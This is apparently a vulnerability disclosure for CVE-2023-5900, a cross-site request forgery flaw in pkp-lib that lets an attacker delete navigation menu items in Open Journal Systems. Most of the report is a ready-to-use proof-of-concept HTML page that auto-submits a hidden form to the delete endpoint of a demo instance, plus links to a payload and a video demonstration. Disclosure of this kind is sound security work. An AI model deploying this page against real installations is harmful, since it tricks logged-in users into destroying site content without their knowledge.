CVE-2023-5900: CSRF Delete Navigation Menu Items in pkp-lib

Description

CSRF Delete Navigation Menu Items

Proof of Concept

1 .Attack sends fake requests to users

<html>
   <body>    
 <form action="https://demo.publicknowledgeproject.org/ojs3/testdrive/index.php/testdrive-journal/$$$call$$$/grid/navigation- 
   menus/navigation-menu-items-grid/delete-navigation-menu-item">      
  <input type="hidden" name="navigationMenuItemId" value="330" />    
  <input type="hidden" name="csrfToken" value="" />     
  <input type="submit" value="Submit request" />
 </form>
 <script>
       history.pushState('', '', '/');
        document.forms[0].submit();
       </script>
    </body>
  </html>

2 .User click, deletes unwanted Navigation Menu Items

Payload Poc

https://drive.google.com/file/d/15cjZ2oBeBmUx-C9_kRqBXKMXLX8LU5Ew/view?usp=sharing

Video Poc

https://drive.google.com/file/d/1Bp1M3ifN9rXdxhjfyAIibmy0QFhYluEu/view?usp=sharing

Impact

Trick users to do unintended actions.